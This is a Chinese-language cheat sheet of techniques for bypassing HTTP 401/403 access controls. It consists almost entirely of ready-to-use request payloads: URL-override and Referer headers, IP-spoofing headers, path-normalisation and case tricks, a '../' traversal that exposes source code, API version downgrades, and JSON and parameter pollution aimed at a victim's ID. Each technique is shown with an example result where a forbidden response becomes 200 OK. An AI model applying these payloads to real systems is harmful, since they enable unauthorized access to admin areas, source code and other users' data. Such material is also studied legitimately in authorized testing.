401/403绕过

一、覆盖请求URL

尝试使用X-Original-URL和X-Rewrite-URL标头绕过Web服务器的限制。

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 ForbiddenReqeust
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OKReqeust
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK

二、Referer头绕过

Referer请求头包含了当前请求页面的来源页面的地址，即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用Referer请求头识别访问来源。

GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 ForbiddenReqeust
GET / HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OKReqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK

三、代理IP

一般开发者会通过Nginx代理识别访问端IP限制对接口的访问，尝试使用X-Forwarded-For、X-Forwared-Host等标头绕过Web服务器的限制。

X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1# IP
127.0.0.1
0.0.0.0
192.168.0.1
10.0.0.1
172.16.0.1

四、扩展名绕过

基于扩展名，用于绕过403受限制的目录。

site.com/admin => 403
site.com/admin/ => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/*/ => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin?? => 200
site.com/admin??? => 200
site.com/admin..;/ => 200
site.com/admin/..;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin%20/ =>200
site.com/admin%09/ => 200
site.com/%20admin%20/ => 200

五、大小写替换&…

# 大小写
site.com/admin -> 403 Forbidden
site.com/Admin -> 200 OK
site.com/aDmin -> 200 OK# ..
site.com/index.php -> File not found
site.com/assets../index.php -> source code
##字典
assets../index.php
/img../index.php
/js../index.php
/vendors../index.php
/media../index.php

六、其他绕过思路

/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:{“id”:111}} --> 200 OK
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON 参数污染)
user_id=ATTACKER_ID&user_id=VICTIM_ID (参数污染)